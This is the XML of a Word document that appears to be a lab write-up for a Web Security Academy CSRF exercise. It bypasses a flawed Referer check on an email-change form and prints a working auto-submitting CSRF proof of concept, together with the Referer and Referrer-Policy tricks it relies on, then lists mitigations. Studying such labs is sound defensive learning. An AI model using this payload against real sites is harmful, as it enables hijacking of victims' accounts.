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14A6E7A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 xml:space="preserve">consists of </w:t>
      </w:r>
      <w:r w:rsidR="00400984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">an email change </w:t>
      </w:r>
      <w:r w:rsidR="00685587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">functionality </w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">which is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00685587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CS</w:t>
      </w:r>
      <w:r w:rsidR="00400984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>RF as</w:t>
      </w:r>
      <w:r w:rsidR="00EB3304" w:rsidRPr="00EB3304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB3304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00EB3304" w:rsidRPr="00EB3304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>t attempts to detect and block cross domain requests, but the detection mechanism can be bypassed</w:t>
      </w:r>
      <w:r w:rsidR="00400984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidR="00685587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>get the credentials of the target</w:t>
      </w:r>
      <w:r w:rsidR="005B750D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FD48847" w14:textId="52618C7B" w:rsidR="002F36B4" w:rsidRDefault="00225346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login with the given credentials to act as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A6A2F67" w14:textId="21327EDA" w:rsidR="00B37F0C" w:rsidRDefault="001412FC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make an email change request using the browser itself and study the request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59556A8D" w14:textId="40EA0DF9" w:rsidR="00362DA9" w:rsidRDefault="00975ADB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the original Referrer header with the Payload 1 and notice that it still gets accepted as the server accepts any request with the domain of the lab and it doesn’t care about the other matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DBC6B" w14:textId="6A50D844" w:rsidR="002C33F1" w:rsidRDefault="002C33F1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use the Engagement tools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generate CSRF PoC using it and add auto submit as true</w:t>
      </w:r>
      <w:r w:rsidR="000405CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000405CF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proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000405CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> function with the Payload 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A128ADC" w14:textId="2C18F8D5" w:rsidR="0052094E" w:rsidRDefault="0052094E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</w:t>
      </w:r>
      <w:r w:rsidR="00117BCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">add the Payload 3 into the head section of the exploit server as nowadays servers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00117BCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>strips</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00117BCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the string and sends only the domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="1068B65F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</w:t>
      </w:r>
      <w:r w:rsidR="00A879E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidR="00B41F9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A350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6E37" w:rsidRPr="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>into the body tag of the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00152D52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and click store</w:t>
      </w:r>
      <w:r w:rsidR="001B5B88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40897979" w:rsidR="00131AF3" w:rsidRDefault="000564D4" w:rsidP="00AF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</w:t>
      </w:r>
      <w:r w:rsidR="00DF0D04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D062A1D" w14:textId="77777777" w:rsidR="000A306E" w:rsidRDefault="000A306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23D745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4D9F744A" w14:textId="08FBB77D" w:rsidR="000405CF" w:rsidRDefault="000405CF" w:rsidP="00040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405CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000405CF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0B6632">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>https://arbitrary-incorrect-domain.net?YOUR-LAB-ID.web-security-academy.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67B1BBE7" w14:textId="4C1476E8" w:rsidR="000405CF" w:rsidRDefault="000405CF" w:rsidP="00040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405CF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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000405CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>("", "", "/?YOUR-LAB-ID.web-security-academy.net")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FFD939" w14:textId="159F9EB6" w:rsidR="00AB7EF2" w:rsidRDefault="00117BCE" w:rsidP="00117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17BCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Referrer-Policy: unsafe-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00117BCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7604058C" w14:textId="77777777" w:rsidR="009A3504" w:rsidRPr="009A3504" w:rsidRDefault="009A3504" w:rsidP="009A35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>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355C65F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9A350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9A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7DD63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2EE5059E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A3504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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>("", "", "/?0a3500770475bd508111b6ac0097003d.web-security-academy.net")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23155265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&lt;form action="https://0a3500770475bd508111b6ac0097003d.web-security-academy.net/my-account/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406B7EC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&lt;input type="hidden" name="email" value="wiener&amp;#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>64;normal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&amp;#45;user&amp;#46;net" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA9A4D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478E2CFA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14:paraId="346044B8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6C390EC6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9A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8AA27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55A48D7B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7066196C" w14:textId="24D4966E" w:rsidR="009A3504" w:rsidRPr="00117BCE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>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806786D" w14:textId="77777777" w:rsidR="0068190F" w:rsidRDefault="0068190F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7706B97A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E1D765E" w14:textId="77777777" w:rsidR="00CF6528" w:rsidRPr="00CF6528" w:rsidRDefault="00CF6528" w:rsidP="00CF65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F6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Strict Referrer Header Checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validate the entire Referrer header to ensure requests originate only from trusted domains. Partial matches or allowing substrings can be exploited, as demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52AFF1" w14:textId="77777777" w:rsidR="00CF6528" w:rsidRPr="00CF6528" w:rsidRDefault="00CF6528" w:rsidP="00CF65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F6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Anti-CSRF Tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Introduce anti-CSRF tokens that are tied to the user's session and include them in every state-changing request. Ensure server-side validation of these tokens with every such request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="501CA9BB" w:rsidR="002F152E" w:rsidRPr="00CF6528" w:rsidRDefault="00CF6528" w:rsidP="00CF65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F6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Content Security Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a strict Content Security Policy (CSP) that prevents unauthorized scripts from executing, reducing potential exploit avenues.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="00CF6528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3B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FD0FE32"/>
    <w:lvl w:ilvl="0" w:tplc="7AA0D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52406"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B8AC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835CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B8C9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7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3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883975352">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="249706895">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1792900401">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1221750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405CF"/>
    <w:rsid w:val="000564D4"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000A306E"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E1134"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00117BCE"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="001412FC"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E"/>
    <w:rsid w:val="00152D52"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00193EED"/>
    <w:rsid w:val="001942EB"/>
    <w:rsid w:val="001B0F8A"/>
    <w:rsid w:val="001B5B88"/>
    <w:rsid w:val="001B6F7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5346"/>
    <w:rsid w:val="00226D86"/>
    <w:rsid w:val="0024123B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C24BB"/>
    <w:rsid w:val="002C33F1"/>
    <w:rsid w:val="002C5D7F"/>
    <w:rsid w:val="002D2C78"/>
    <w:rsid w:val="002E07F4"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F36B4"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="00303C1A"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00307CC9"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="00352F2B"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00362DA9"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="0039456D"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00400984"/>
    <w:rsid w:val="00426ED0"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759"/>
    <w:rsid w:val="0047478A"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="004E4E12"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="0052094E"/>
    <w:rsid w:val="0052488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="00565BE0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214"/>
    <w:rsid w:val="005859B1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5F4BF7"/>
    <w:rsid w:val="006009AF"/>
    <w:rsid w:val="00615EAD"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="0068190F"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00685587"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C0B72"/>
    <w:rsid w:val="006C25F7"/>
    <w:rsid w:val="006C26C7"/>
    <w:rsid w:val="006C7444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6CCB"/>
    <w:rsid w:val="007977EA"/>
    <w:rsid w:val="007A7433"/>
    <w:rsid w:val="007B5BBE"/>
    <w:rsid w:val="007C289E"/>
    <w:rsid w:val="007F5950"/>
    <w:rsid w:val="008264C3"/>
    <w:rsid w:val="00835E1D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05CEE"/>
    <w:rsid w:val="00914F8A"/>
    <w:rsid w:val="00916E37"/>
    <w:rsid w:val="00917626"/>
    <w:rsid w:val="00921403"/>
    <w:rsid w:val="009303B4"/>
    <w:rsid w:val="00932EDF"/>
    <w:rsid w:val="00933DCA"/>
    <w:rsid w:val="0094184C"/>
    <w:rsid w:val="00950F42"/>
    <w:rsid w:val="00962C00"/>
    <w:rsid w:val="009662AA"/>
    <w:rsid w:val="00970BF8"/>
    <w:rsid w:val="00975ADB"/>
    <w:rsid w:val="009764B7"/>
    <w:rsid w:val="009A34DE"/>
    <w:rsid w:val="009A3504"/>
    <w:rsid w:val="009E4AD8"/>
    <w:rsid w:val="009F411A"/>
    <w:rsid w:val="00A01591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00A879E8"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00AB7EF2"/>
    <w:rsid w:val="00AD0C9C"/>
    <w:rsid w:val="00AF10D6"/>
    <w:rsid w:val="00AF3753"/>
    <w:rsid w:val="00AF4389"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B156EB"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B37F0C"/>
    <w:rsid w:val="00B41F9C"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B5116D"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA74EB"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC0D3D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A5603"/>
    <w:rsid w:val="00CB1CA7"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>
    <w:rsid w:val="00CF6528"/>
    <w:rsid w:val="00D043EB"/>
    <w:rsid w:val="00D1236B"/>
    <w:rsid w:val="00D46E1C"/>
    <w:rsid w:val="00D64007"/>
    <w:rsid w:val="00D70127"/>
    <w:rsid w:val="00D76CFA"/>
    <w:rsid w:val="00D82D12"/>
    <w:rsid w:val="00D85717"/>
    <w:rsid w:val="00DA01A0"/>
    <w:rsid w:val="00DA1896"/>
    <w:rsid w:val="00DB3836"/>
    <w:rsid w:val="00DB6596"/>
    <w:rsid w:val="00DC6ED7"/>
    <w:rsid w:val="00DD41D5"/>
    <w:rsid w:val="00DD59AE"/>
    <w:rsid w:val="00DF0D04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3D6D"/>
    <w:rsid w:val="00E8403F"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EB3304"/>
    <w:rsid w:val="00EC1C27"/>
    <w:rsid w:val="00EC37BE"/>
    <w:rsid w:val="00EF5628"/>
    <w:rsid w:val="00F24ADA"/>
    <w:rsid w:val="00F42E09"/>
    <w:rsid w:val="00F443AB"/>
    <w:rsid w:val="00F455FA"/>
    <w:rsid w:val="00F51D87"/>
    <w:rsid w:val="00F63D6F"/>
    <w:rsid w:val="00F748E3"/>
    <w:rsid w:val="00F9385F"/>
    <w:rsid w:val="00F950C9"/>
    <w:rsid w:val="00FB1ED0"/>
    <w:rsid w:val="00FB60C3"/>
    <w:rsid w:val="00FB7477"/>
    <w:rsid w:val="00FB7C64"/>
    <w:rsid w:val="00FC69AB"/>
    <w:rsid w:val="00FD685D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0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bitrary-incorrect-domain.net?YOUR-LAB-ID.web-security-academy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2023-09-18T09:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T05:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>